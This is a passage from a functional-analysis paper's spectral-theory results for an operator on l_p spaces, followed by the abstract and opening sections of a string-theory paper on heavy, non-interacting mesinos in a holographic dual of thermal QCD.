\tag{4.2}\] where \(n\in\mathbb{N}\cup\{0\}\) with \(y_{0}=z_{0}=0\) and \(y_{n}=x_{2n-1}\), \(z_{n}=x_{2n}\). Clearly each of the difference equations (4.1) and (4.2) have two fundamental solutions. Let \(\{y_{n}^{(1)}(\lambda),y_{n}^{(2)}(\lambda)\}\) and \(\{z_{n}^{(1)}(\lambda),z_{n}^{(2)}(\lambda)\}\) are the sets of fundamental solutions of the equations (4.1) and (4.2) respectively. Under this setting we have the following result: **Theorem 4.6**.: If either of the sufficient conditions mentioned in Theorem 4.4 and Theorem 4.5 hold true then the point spectrum of \(T\) is given by \[\sigma_{p}(T,\ell_{p})=\left\{\lambda\in\mathbb{C}:y_{0}^{(1)}(\lambda)=0 \right\}\cup\left\{\lambda\in\mathbb{C}:{z_{0}}^{(1)}(\lambda)=0\right\}.\] _Remark 4.7_.: The adjoint operator \(T^{*}:\ell_{p}^{*}\to\ell_{p}^{*}\), is represented by transpose of the matrix \(T\) and dual of \(\ell_{p}\) is isomorphic to \(\ell_{q}\) where \(\frac{1}{p}+\frac{1}{q}=1\) and \(1<q<\infty\). Similar as \(T\), the operator \(T^{*}\) can also be written as \[T^{*}=T_{0}+K^{t},\] where \(K^{t}\) denotes the transpose of \(K\) and \(K^{t}\) is also a compact operator. Since \(\sigma(T,\ell_{p})=\sigma(T^{*},\ell_{p}^{*})\), Theorem 4.2 implies \[\sigma(T_{0},\ell_{p})\subseteq\sigma(T^{*},\ell_{p}^{*}),\] and using similar argument of the proof of Theorem 4.2 it can be obtain that \(\sigma(T^{*},\ell_{p}^{*})\setminus\sigma(T_{0},\ell_{p})\) contains finite or countable number of eigenvalues of \(T^{*}\) of finite type with no accumulation point in \(\sigma(T^{*},\ell_{p}^{*})\setminus\sigma(T_{0},\ell_{p})\). Assuming similar hypothesis on the rate of convergence of sequences in Theorem 4.4, we can prove that \[\sigma_{ess}(T^{*},\ell_{p}^{*})\cap\sigma_{p}(T^{*},\ell_{p}^{*})=\emptyset\] and this implies, the point spectrum of \(T^{*}\) is lying outside of the region \[[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}].\] Now similar as Theorem 4.6, let \(\{g_{n}^{(1)}(\lambda),g_{n}^{(2)}(\lambda)\}\) and \(\{h_{n}^{(1)}(\lambda),h_{n}^{(2)}(\lambda)\}\) are the sets of fundamental solutions of the following difference equations respectively \[b_{2n-1}g_{n}+(a_{2n+1}-\lambda)g_{n+1}+c_{2n+1}g_{n+2}=0,\] \[b_{2n}h_{n}+(a_{2n+2}-\lambda)h_{n+1}+c_{2n+2}h_{n+2}=0,\] which are obtained from \(T^{*}f=\lambda f\), \(f\in\ell_{p}^{*}\) and \(g_{n}(\lambda)=f_{2n-1}(\lambda)\), \(h_{n}(\lambda)=f_{2n}(\lambda)\). Also, \(g_{0}(\lambda)=h_{0}(\lambda)=0\). This leads us to the following result \[\sigma_{p}(T^{*},\ell_{p}^{*})=\left\{\lambda\in\mathbb{C}:g_{0}^{(1)}(\lambda )=0\right\}\cup\left\{\lambda\in\mathbb{C}:h_{0}^{(1)}(\lambda)=0\right\}.\] Eventually, we obtain that \[\sigma(T^{*},\ell_{p}^{*})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2 s_{2}]\cup S_{2}.\] where, \[S_{2}=\left\{\lambda\in\mathbb{C}:g_{0}^{(1)}(\lambda)=0\right\}\cup\left\{ \lambda\in\mathbb{C}:h_{0}^{(1)}(\lambda)=0\right\}.\] Since, \(\sigma(T,\ell_{p})=\sigma(T^{*},\ell_{p}^{*})\) and \(S_{1},S_{2}\) both sets are disjoint from \([r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\) we have, \(S_{1}=S_{2}\). Using the observations in Remark 4.7 and Proposition 2.1, we can summarize all the results of spectrum and various spectral subdivisions of the operator \(T\) in the following theorem, **Theorem 4.8**.: If the convergence of the sequences \(\{a_{2n-1}\},\;\{a_{2n}\},\;\{b_{2n-1}\},\;\{b_{2n}\},\)\(\{c_{2n-1}\}\) and \(\{c_{2n}\}\) are exponentially fast then the following hold, 1. The spectrum of \(T\) on \(\ell_{p}\) is \[\sigma(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}] \cup S_{1}.\] 2. The point spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{p}(T,\ell_{p})=\left\{\lambda\in\mathbb{C}:y_{0}^{(1)}(\lambda)=0 \right\}\cup\left\{\lambda\in\mathbb{C}:z_{0}^{(1)}(\lambda)=0\right\}.\] 3. The residual spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{r}(T,\ell_{p})=\emptyset.\] 4. The continuous spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{c}(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_ {2}].\] 5. The essential spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{ess}(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s _{2}].\] 6. The discrete spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{d}(T,\ell_{p})=\left\{\lambda\in\mathbb{C}:y_{0}^{(1)}(\lambda)=0 \right\}\cup\left\{\lambda\in\mathbb{C}:z_{0}^{(1)}(\lambda)=0\right\}.\] 7. The compression spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{co}(T,\ell_{p})=\left\{\lambda\in\mathbb{C}:y_{0}^{(1)}(\lambda)=0 \right\}\cup\left\{\lambda\in\mathbb{C}:z_{0}^{(1)}(\lambda)=0\right\}.\] 8. The approximate spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{app}(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2 s_{2}]\cup S_{1}.\] 9. The defect spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{\delta}(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+ 2s_{2}]\cup S_{1}.\] Proof.: The proofs of the above statements are given below. 1. It is well known that \(\sigma_{p}(T,\ell_{p})\subseteq\sigma(T,\ell_{p})\) and \(\sigma(T_{0},\ell_{p})\subseteq\sigma(T,\ell_{p})\). This implies, \[[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}\subseteq \sigma(T,\ell_{p}).\] Also by using Theorem (4.2) we get, \[\sigma(T,\ell_{p})\subseteq[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+ 2s_{2}]\cup S_{1}.\] Hence, \[\sigma(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}] \cup S_{1}.\] 2. Result has been proved in Theorem 4.6. 3. We already aware of that \(\sigma_{r}(T,\ell_{p})=\sigma_{p}(T^{*},\ell_{p}^{*})\setminus\sigma_{p}(T, \ell_{p})\). Hence, \[\sigma_{r}(T,\ell_{p})=\emptyset.\] 4. Spectrum of an operator is the disjoint union of point spectrum, residual spectrum and continuous spectrum. By using this result we can obtain the desired result. 5. The required result has been proved in Corollary 4.3. * We already proved that the point spectrum of \(T\) is disjoint from \([r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\), and by Theorem 4.2 we have, every element of \(\sigma_{p}(T,\ell_{p})\) is of finite type. Hence, \[\sigma_{d}(T,\ell_{p})=\left\{\lambda\in\mathbb{C}:y_{0}^{(1)}(\lambda)=0 \right\}\cup\left\{\lambda\in\mathbb{C}:{z_{0}}^{(1)}(\lambda)=0\right\}.\] * By part (e) of Proposition 2.1, the desired result is obvious. * Clearly, \[\sigma_{app}(T,\ell_{p})\subseteq\sigma(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1} ]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}.\] Also, we know that point spectrum is always a subset of approximate point spectrum. By using this fact and with the help of part (g) of Proposition 2.1, we have \[[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}\subseteq \sigma_{app}(T,\ell_{p}).\] Hence, \[\sigma_{app}(T,\ell_{p})=\sigma(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[ r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}.\] * By part (c) of Proposition 2.1, we have \[\sigma_{app}(T^{*},\ell_{p}^{*})=\sigma_{\delta}(T,\ell_{p}).\] Clearly, \[\sigma_{app}(T^{*},\ell_{p}^{*})\subseteq\sigma(T^{*},\ell_{p}^{*})=[r_{1}-2 s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}.\] As \(\sigma_{p}(T^{*},\ell_{p}^{*})\subseteq\sigma_{app}(T^{*},\ell_{p}^{*})\) thus \(S_{1}\subseteq\sigma_{app}(T^{*},\ell_{p}^{*})\). By using this fact and with the help of part (g) of Proposition 2.1, we have \[[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}\subseteq \sigma_{app}(T^{*},\ell_{p}^{*}).\] Therefore, \(\sigma_{app}(T^{*},\ell_{p}^{*})=\sigma(T,\ell_{p})\). Hence, \[\sigma_{\delta}(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2} +2s_{2}]\cup S_{1}.\] ### Disclosure statement No potential conflict of interest was reported by the authors.
2308.05033
QCD-Compatible Supermassive Inert Top-Down Holographic Mesinos at Intermediate Coupling
A longstanding problem with the popular Sakai-Sugimoto holographic dual of thermal QCD is that the "mesinos", the (non-supersymmetric) fermionic partners of the mesons, are nearly isospectral with mesons and have an unsuppressed mesino-meson interaction, both being in contradiction with actual QCD. We solve this problem in a UV-complete (and ${\it different}$) type IIA string dual ${\it at\ intermediate\ coupling}$ of realistic thermal QCD, in which the mesinos are shown to be much heavier than and non-interacting with mesons (the wave-function/mass/interaction terms receiving no ${\cal M}$-theory ${\cal O}(R^4)$ corrections). In particular we derive a large-$N$ enhancement of the KK mass scale $M_{KK}$ (from $M_{KK}$ to $M_{KK}^{\rm eff}\sim N^{1 + \frac{1}{{\cal O}(1)}}M_{KK}$) arising from the construction of the type IIA mirror \cite{MQGP} of the type IIB dual \cite{metrics} of thermal QCD-like theories, as well as the generation of a one-parameter family of $M_{KK}$-independent mass scale at ${\cal O}(R^4)$ in the ${\cal M}$-theory uplift \cite{OR4} wherein the parameter can be made appropriately large. We also show that the mesino-mesino-single-($\rho/\pi$)meson interactions, vanish identically in the aforementioned type IIA holographic dual.
Aalok Misra, Gopal Yadav
2023-08-09T16:02:59Z
http://arxiv.org/abs/2308.05033v3
# QCD-Compatible Supermassive Inert Top-Down Holographic Mesinos at Intermediate Coupling ###### Abstract A longstanding problem with the popular Sakai-Sugimoto holographic dual of thermal QCD is that the "mesinos", the (non-supersymmetric) fermionic partners of the mesons, are nearly isospectral with mesons and have an unsuppressed mesino-mesino-meson interaction, both being in contradiction with actual QCD. We solve this problem in a UV complete (and _different_) type IIA string dual _at intermediate coupling_ of realistic thermal QCD, in which the mesinos are shown to be much heavier than and non-interacting with mesons (the wave-function/mass/interaction terms receiving no \({\cal M}\)-theory \({\cal O}(R^{4})\) corrections). In particular we derive a large-\(N\) enhancement of the KK mass scale \(M_{KK}\) (from \(M_{KK}\) to \(M_{KK}^{\rm eff}\sim N^{1+\frac{\alpha}{\alpha(1)}}M_{KK}\)) arising from the construction of the type IIA mirror [1] of the type IIB dual [2] of thermal QCD-like theories, as well as the generation of a one-parameter family of \(M_{KK}\)-independent mass scale at \({\cal O}(R^{4})\) in the \({\cal M}\)-theory uplift [3] wherein the parameter can be made appropriately large. We also show that the mesino-mesino-single-\((\rho/\pi)\)meson interactions, vanish identically in the aforementioned type IIA holographic dual. ###### Contents * 1 Introduction * 2 Type IIA String Dual of Thermal QCD-Like Theories Inclusive of \({\cal O}(R^{4})\) Corrections * 3 Supermassive Mesinos in Type IIA String Theory * 4 Generation of \(N\)-hanced Mass Scale for \(T<T_{c}\) * 5 Non-Interacting Mesinos * 6 Top-Down \(m_{\rm quark}\langle\bar{q}q\rangle\) Non-Renormalization up to \({\cal O}(R^{4})\) * 7 Universality in Particle Wave Functions in the IR * 8 Summary * A Finite Baryon Chemical Potential * B EOM-Related for Massive Mesinos * C \(\tilde{z}=\)Constant Embedding of Flavor \(D6\)-Branes Inclusive of \({\cal O}(\beta)\) Corrections * D Constants appearing in the Solution to the Mesino Wave-Function for \(T>T_{c}\) * E Summary of Applications of Top-Down Holographic QCD [1], [3] ## 1 Introduction One can construct gauge theories from a stack of \(D\)-branes and various configurations of the same. In this context, in the spirit of (non-conformal, non-supersymmetric) gauge-gravity duality (inspired by [4]), mostly bosonic fluctuations on the world volume of \(D\)-branes have been considered. The type IIA dual inclusive of the \({\cal O}(R^{4})\) corrections - to explore the finite-\(N\)-limit/intermediate coupling regime of QCD - of the type IIB dual [2] of thermal QCD-like theories, was worked out in [1] and [3]. As a recent example, inclusive of higher derivative corrections to address the finite-\(N\)/intermediate coupling regime (as worked out in [3]), phenomenologically-compatible low energy coupling constants up to NLO in the chiral expansion in \(SU(3)\) chiral perturbation theory (in the chiral limit) were obtained from the DBI action on flavor \(D6\)-branes in [5]. Dirac-like action for the supersymmetric partners of mesons, the mesinos, has been obtained from a top-down approach on \(Dp\)-branes [6], see [7] for the bottom-up approach. However, using the same for the Sakai-Sugimoto type IIA dual [8] of thermal QCD, it was shown that one runs into a problem - the mesinos and mesons turn out to be approximately isospectral and their interaction is not large-\(N\) suppressed [9] - both _in contradiction with real QCD_. This serves as the main motivation for this paper - to see if this issue can be resolved in the type IIA mirror [1] at intermediate coupling [3] of the non-supersymmetric _UV-complete_ type IIB dual [2] of thermal QCD-like theories. In this paper, we explicitly consider the mesino action on flavor \(D6\)-branes in the aforementioned type IIA dual. _We also see the effect of higher derivative terms on the fermions relevant to holographic thermal QCD in this paper which was missing in [6]. In short, we will show that the mesinos are supermassive and do not interact with the vector/\(\pi\) mesons, which is why we refer to them as W(eakly) I(interacting) S(upermassive) P(articles), thereby not being in conflict with realistic QCD._ The following serves as a brief summary of the main results of this paper. * _Supermassive mesinos_ (Sec. 3): * _Dirichlet/Neumann boundary condition for the radial profile of the mesino wave function_: The on-shell DBI Lagrangian density \(\mathcal{L}^{\text{DBI, D6}}_{\text{on-shell}}\) of the type IIA flavor \(D6\)-branes (corresponding to \(i:\Sigma_{(7)}\cong S^{1}_{t}\times_{w}\mathbb{R}^{3}\times\mathbb{R}_{\geq 0 }\times_{w}S^{2}_{\text{squashed}}(a)\hookrightarrow M_{10}\) [the embedding of the flavor \(D6\)-branes in the ten-dimensional background involving a warped squashed resolved conifold] in the \(\psi=2n\pi,n=0,1,2\)-coordinate patches and for vanishingly small Ouyang embedding parameter in the parent type IIB dual) obtained from the SYZ mirror of the type IIB holographic dual of [2], in the intermediate-\(N\) MQGP limit (3), can be shown to be vanishingly small. The mesino EOM, \[\mathcal{A}\Theta+\Bigg{[}\frac{\Lambda_{2}\left(\left\{\Gamma^{\alpha} \right\},\mathcal{F}^{\text{IIA}},\mathcal{A}\right)}{\mathcal{L}^{\text{DBI, D6}}_{\text{on-shell}}}+\frac{\Lambda_{3}\left(\left\{\Gamma^{\alpha} \right\},\mathcal{F}^{\text{IIA}}\right)}{\left(\mathcal{L}^{\text{DBI, D6}}_{\text{on-shell}}\right)^{2}}\Bigg{]}\Gamma^{\gamma}D_{\gamma}\Theta=0,\] (where \(\gamma\in\left\{t,x^{1,2,3},r,\theta_{2},\tilde{y}\right\}\) indexing coordinates of the flavor \(D6\) branes' world volume \(\Sigma_{(7)}\), and \(\mathcal{A},\mathcal{F}^{\text{IIA}}\) are defined in (21), (16) respectively; \(\Lambda_{2,3}\) can be read off from (20)) can hence be approximated by a massless Dirac equation on \(\Sigma_{(7)}\). * Either by looking at the \(SU(3)\) and the "transverse" \(SU(3)\) structures on \(M_{6}(=S^{1}_{t}\times_{w}\mathcal{T},\ \times_{w}\) implying a warped product, \(S^{1}_{t}\) being the thermal circle and \(\mathcal{T}\) - deformed \(T^{1,1}\) - being the base of a warped non-Kahler squashed resolved conifold)/\(\tilde{M}_{6}(=\)non-Kahler warped squashed resolved conifold), or when considering the embedding of the \(D6\)-brane world volume \(\Sigma_{(7)}\cong S^{1}_{t}\times_{w}(\mathbb{R}^{3}\times\mathbb{R}_{\geq 0 })\times_{w}S^{2}_{\text{squashed}}\) in \(M_{10}\) considered either as \((S^{1}_{t}\times_{w}\mathbb{R}^{3})\times_{w}\tilde{M}_{6}\) or \(\mathbb{R}^{3}\times_{w}(\mathbb{R}_{\geq 0}\times M_{6})\), one is therefore guaranteed the existence of a pair of globally defined spinors. Using the same, and imposing anti-periodic boundary conditions along \(S_{t}^{1}\), the ansatz (26) was made for the mesino spinor, and the radial profile functions therein, were solved for. * For the thermal background (5) dual to thermal QCD for \(T<T_{c}\), as well as the black-hole background (4) dual to thermal QCD for \(T>T_{c}\), we found that Dirichlet/Neumann boundary condition at \(r=r_{0}\) (IR cut-off in the thermal background)/\(r=r_{h}\) permitted supermassive mesinos. * _Enhacement of mass scale_: * Starting from the \(D=11\) supergravity Einstein's field equations in the presence of four-form \(G\) fluxes of \(\mathcal{M}\)-theory, we explicitly show the generation of an \(N\)-enhanced (\(\equiv\) "\(N\)-hanced") mass scale, thereby providing the mechanism of generation of supermassive mesinos. * Replacing the resolution parameter "\(a\)" of the blown-up \(S^{2}\) by \(a(r)\), substituting an ansatz: \(a(r)=b+c^{\beta^{0}}(r-r_{0})+\beta\mathcal{A}^{\beta}(r)\) into the Einstein's equations and estimating \(r_{0}\sim e^{-\kappa_{r_{0}}N^{1/3}}\)[23], near the \(\psi=2n\pi,n=0,1,2\)-coordinate patches, we therefore see that: \[b\sim N^{1+\frac{1}{\mathcal{O}(1)}}r_{0};\quad\mathcal{A}^{\beta}(r)= \mathcal{C}e^{\frac{c_{\text{linear}}}{b}r},\ \mathcal{C}\equiv\text{constant}.\] (1) * _Vanishing mesino-mesino-meson interaction_ (Sec. 5): Considering fluctuations of the vector mesons \(A_{\mu\in S_{t}^{1},\mathbb{R}^{3},r}\to A_{\mu,r}^{(0)}+\delta A_{\mu,r}\) (with \(A_{\mu=t}^{(0)}\) being the only non-zero background value) in the fermionic flavor \(D6\)-brane action and retaining terms linear in the same, performing a KK expansion of the field strength fluctuation along with decomposition of the positive-chirality Majorana-Weyl mesino spinor along \(M_{5}(t,x^{1,2,3},r)\) and \(\tilde{M}_{5}(\theta_{1,2},\phi_{1,2},\psi)\), we were able to show that no mesino-mesino-\(\rho/\pi\)-meson vertex is generated. * _Non-renormalization of the mesino wave function and mass_ (Sec. 3, and appendices B and D): With the aim of studying the effect of \(\mathcal{O}(R^{4})\) terms on the fermions relevant to holographic thermal QCD which was missing in [6], leads us _to a non-renormalization of the mesino wave function and mass in the sense that both turn out to be independent of the \(\mathcal{O}(R^{4})\) terms up to \((l_{p}^{6}/N^{\alpha}),\alpha\geq 1\)1, \(l_{p}\) being the Planckian length. Footnote 1: In [3], terms up to \(\mathcal{O}\left(\frac{\beta^{0}}{N}\right)\) and \(\mathcal{O}\left(\frac{\beta}{N^{\alpha}}\right),\ 0<\alpha<1,\ \beta\sim l_{p}^{6}\), were considered. * _In the same way,_ \(\mathcal{O}\left(\frac{\beta^{0}}{N}\right)\) and \(\mathcal{O}\left(\frac{\beta}{N^{\alpha}}\right),\ 0<\alpha<1,\ \beta\sim l_{p}^{6}\), where \(l_{p}^{6}\) is the Planckian length. * _In the same way,_ \(\mathcal{O}\left(\frac{\beta}{N}\right)\) and \(\mathcal{O}\left(\frac{\beta}{N^{\alpha}}\right)\) are the same as the \(\mathcal{O}\left(\frac{\beta}{N^{\alpha}}\right)\) and \(\mathcal{O}\left(\frac{\beta}{N^{\alpha}}\right)\) are the same as the \(\mathcal{O}\left(\ universality in the context of glueball, meson, and graviton wave-functions. The summary of the paper has been provided in section 8. There are five appendices. Appendix A contains the discussion of baryon chemical potential. Appendix B consists of quantities appearing in the mesino EOMs of section 3. In Appendix C, we compute the embedding of flavor \(D6\)-branes in type IIA string theory inclusive of \({\cal O}(R^{4})\) corrections. We list the constants appearing in the wave function for the black hole background in appendix D. Finally, we summarize the top-down holographic QCD results obtained by our group in appendix E. ## 2 Type IIA String Dual of Thermal QCD-Like Theories Inclusive of \({\cal O}(R^{4})\) Corrections Thermal QCD-like theories refer to the equivalence class of theories that are IR confining and UV conformal with the "quarks" transforming in the fundamental representation of the symmetry groups(color and flavor). The UV-complete type IIB string dual of such large-\(N\) thermal QCD-like theories was constructed in [2]. The brane picture consists of \(N\) space-time filling \(D3\)-branes at the tip of a warped resolved conifold, \(M\) space-time filling \(D5\) branes also at the tip of the conifold as mentioned above wrapping the vanishing squashed \(S^{2}\) and at the North Pole of the resolved squashed \(S^{2}\) of radius \(a\) (resolution parameter), and space-time filling \(\overline{D5}\)-branes also at the tip of the conifold wrapping the abovementioned vanishing squashed \(S^{2}(\theta_{1},\phi_{1})\) and at the South Pole of the resolved squashed \(S^{2}(\theta_{2},\phi_{2})\). In addition, there are \(N_{f}\) space-time filling flavor \(D7\)-branes wrapping the vanishing squashed \(S^{3}(\theta_{1},\phi_{1},\psi)\) as well as being at the North Pole of the squashed resolved \(S^{2}(\theta_{2},\phi_{2})\), dipping into the IR up to \(|\mu_{\rm Ouyang}|^{\frac{2}{3}},\ |\mu_{\rm Ouyang}|\) being the modulus of the Ouyang embedding parameter in the Ouyang embedding of the flavor \(D7\)-branes: \[\left(9a^{2}r^{4}+r^{6}\right)^{1/4}e^{\frac{i}{2}(\psi-\phi_{1}-\phi_{2})} \sin\frac{\theta_{1}}{2}\sin\frac{\theta_{2}}{2}=\mu_{\rm Ouyang}. \tag{2}\] An equal number of \(\overline{D7}\) wrapping the vanishing squashed \(S^{3}(\theta_{1},\phi_{1},\psi)\) and at the South Pole of the blown-up squashed \(S^{2}(\theta_{2},\phi_{2})\), are also present. Equal number of \(D5/D7\)-branes and \(\overline{D5}/\overline{D7}\)-branes in the UV ensure UV conformality. The presence of \(N_{f}\) flavor \(D7\) and \(\overline{D7}\)-branes in the UV, implies a flavor gauge group \(SU(N_{f})\times SU(N_{f})\) in the UV which is broken to \(SU(N_{f})\) due to absence of \(\overline{D7}\)-branes in the IR 2 (analog of chiral symmetry breaking in this brane setup). The brane construct in the type IIB dual is summarized in the table 1: Footnote 2: On the gravity dual side we characterize UV(\(r>{\cal R}_{D5/\overline{D5}}\)) and IR (\(r<{\cal R}_{D5/\overline{D5}}\)) in term of radial coordinate where \({\cal R}_{D5/\overline{D5}}\) is the boundary between UV and IR, and separation between \(D5\) and \(\overline{D5}\)-branes. IR confinement in the gravity dual is affected by deforming the vanishing squashed \(S^{3}\) in the conifold. Since we are interested in finite temperature QCD, the same is effected via the black hole (\(T>T_{c}\)) and thermal (\(T<T_{c}\)) backgrounds on the gravity dual side. Due to finite temperature and finite separation of \(D5\) and \(\overline{D5}\)-branes on the brane side, the conifold further needs also to possess an \(S^{2}\)-blow-up/resolution (with radius/resolution parameter \(a\)). Additionally, the ten-dimensional warp factor and fluxes include the effect of back-reaction. Therefore, we conclude that string dual of thermal QCD-like theories in the large-\(N\) limit involves a warped resolved deformed conifold. The additional advantage of the type IIB dual of [2] is that in the IR, at the end of a Seiberg-like duality cascade, the number of colors \(N_{c}\) gets identified with \(M\), which in the intermediate-\(N\) MQGP limit [1], [10] \[g_{s}\sim\frac{1}{\mathcal{O}(1)},M,N_{f}\equiv\mathcal{O}(1),N>1,\frac{g_{s}M ^{2}}{N}\ll 1,\frac{\left(g_{s}M^{2}\right)\left(g_{s}N_{f}\right)}{N}\ll 1, \tag{3}\] can be tuned to equal 3; given that one is working in the vanishing-Ouyang-modulus limit (\(|\mu_{\text{Ouyang}}|\ll 1\) in (2)) of the embedding of the flavor \(D7\)-branes, \(N_{f}\) can be set to either 2 or 3 corresponding to the lightest quark flavors [5]. Now, to explore the intermediate coupling regime, the \(\mathcal{O}(R^{4})\) terms in eleven-dimensional supergravity action were considered in [3]. \(\mathcal{M}\)-theory uplift was obtained in two steps: the type IIA Strominger-Yau-Zaslow (SYZ) mirror of type IIB setup was first obtained, and then the former was uplifted to \(\mathcal{M}\)-theory. To obtain type IIA SYZ mirror of type IIB setup, a triple T-duality was performed along a \begin{table} \begin{tabular}{|c|c|c|} \hline S. No. & Branes & World Volume \\ \hline 1. & \(N\)\(D3\) & \(\mathbb{R}^{1,3}(t,x^{1,2,3})\times\{r=0\}\) \\ \hline 2. & \(M\)\(D5\) & \(\mathbb{R}^{1,3}(t,x^{1,2,3})\times\{r=0\}\times S^{2}(\theta_{1},\phi_{1}) \times\text{NP}_{S^{2}_{a}(\theta_{2},\phi_{2})}\) \\ \hline 3. & \(M\)\(\overline{D5}\) & \(\mathbb{R}^{1,3}(t,x^{1,2,3})\times\{r=0\}\times S^{2}(\theta_{1},\phi_{1}) \times\text{SP}_{S^{2}_{a}(\theta_{2},\phi_{2})}\) \\ \hline 4. & \(N_{f}\)\(D7\) & \(\mathbb{R}^{1,3}(t,x^{1,2,3})\times\mathbb{R}_{+}(r\in[|\mu_{\text{Ouyang}}|^{ \frac{2}{3}},r_{\text{UV}}])\times S^{3}(\theta_{1},\phi_{1},\psi)\times\text {NP}_{S^{2}_{a}(\theta_{2},\phi_{2})}\) \\ \hline 5. & \(N_{f}\)\(\overline{D7}\) & \(\mathbb{R}^{1,3}(t,x^{1,2,3})\times\mathbb{R}_{+}(r\in[\mathcal{R}_{D5/ \overline{D5}}-\epsilon,r_{\text{UV}}])\times S^{3}(\theta_{1},\phi_{1},\psi) \times\text{SP}_{S^{2}_{a}(\theta_{2},\phi_{2})}\) \\ \hline \end{tabular} \end{table} Table 1: The Type IIB Brane Construct of [2] (NP and SP respectively denote the North Pole and South Pole of the blown-up \(S^{2}\)). local special Lagrangian (sLag) \(T^{3}(x,y,z)\) where \((x,y,z)\) are the toroidal analogs of \((\phi_{1},\phi_{2},\psi)\) - which could be identified with the \(T^{2}\)-invariant sLag of [11] - in the large-complex structure limit effected by making the base \(\mathcal{B}(r,\theta_{1},\theta_{2})\) (of a \(T^{3}(\phi_{1},\phi_{2},\psi)\)-fibration over \(\mathcal{B}(r,\theta_{1},\theta_{2})\)) large [1], [12]. Hence, all the color and flavor \(D\)-branes get T-dualized to color and flavor \(D6\)-branes. The \(\mathcal{M}\)-theory uplift metric [1], [3] (finite-but-large-\(N\)/intermediate coupling) of [2] (UV-complete type IIB holographic dual of large-\(N\) thermal QCD-like theories) is expressed in the following form: \[ds_{11}^{2} = e^{-\frac{2\phi^{\rm IIA}}{3}}\Bigg{[}\frac{1}{\sqrt{h(r,\theta_ {1,2})}}\left(-g(r)dt^{2}+\left(dx^{1}\right)^{2}+\left(dx^{2}\right)^{2}+ \left(dx^{3}\right)^{2}\right) \tag{4}\] \[+\sqrt{h(r,\theta_{1,2})}\left(\frac{dr^{2}}{g(r)}+ds_{\rm IIA}^{ 2}(r,\theta_{1,2},\phi_{1,2},\psi)\right)\Bigg{]}+e^{\frac{4\phi^{\rm IIA}}{3 }}\left(dx^{11}+A_{\rm IIA}^{F_{11}^{\rm IIB}+F_{3}^{\rm IIB}+F_{5}^{\rm IIB}} \right)^{2},\] where the type IIA RR 1-forms, \(A_{\rm IIA}^{F_{i=1,3,5}^{\rm IIB}}\) are obtained from type IIB \(F_{1,3,5}^{\rm IIB}\) fluxes via the SYZ mirror of type IIB string dual [2], \(g(r)=1-\frac{r_{a}^{4}}{r^{4}}\), and \(\phi^{\rm IIA}\) is the type IIA dilaton profile. For low temperatures, i.e., \(T<T_{c}\), the thermal gravitational dual is given by: \[ds_{11}^{2} = e^{-\frac{2\phi^{\rm IIA}}{3}}\Bigg{[}\frac{1}{\sqrt{h(r,\theta_ {1,2})}}\left(-dt^{2}+\left(dx^{1}\right)^{2}+\left(dx^{2}\right)^{2}+\tilde{ g}(r)\left(dx^{3}\right)^{2}\right) \tag{5}\] \[+\sqrt{h(r,\theta_{1,2})}\left(\frac{dr^{2}}{\tilde{g}(r)}+ds_{ \rm IIA}^{2}(r,\theta_{1,2},\phi_{1,2},\psi)\right)\Bigg{]}+e^{\frac{4\phi^{ \rm IIA}}{3}}\left(dx^{11}+A_{\rm IIA}^{F_{11}^{\rm IIB}+F_{3}^{\rm IIB}+F_{5} ^{\rm IIB}}\right)^{2},\] where \(\tilde{g}(r)=1-\frac{r_{0}^{4}}{r^{4}}\). One notes that \(t\to x^{3},\ x^{3}\to t\) in (4) followed by a Double Wick rotation in the new \(x^{3},t\) coordinates obtains (5); \(h(r,\theta_{1,2})\) is the ten-dimensional warp factor [1, 2]. This is equivalent to: \(-g_{tt}^{\rm BH}(r_{h}\to r_{0})=g_{x^{3}x^{3}}\ {\rm Thermal}(r_{0})\), \(g_{x^{3}x^{3}}^{\rm BH}(r_{h}\to r_{0})=-g_{tt}\ {\rm Thermal}(r_{0})\) in the results of [13], [3] (see [14] in the context of Euclidean/black \(D4\)-branes in type IIA). In (5), we will assume the spatial part of the solitonic \(M3\) brane (which, locally, could be interpreted as solitonic \(M5\)-brane wrapped around a homologous sum of \(S_{\rm squashed}^{2}\)[15]) and their world volume given by 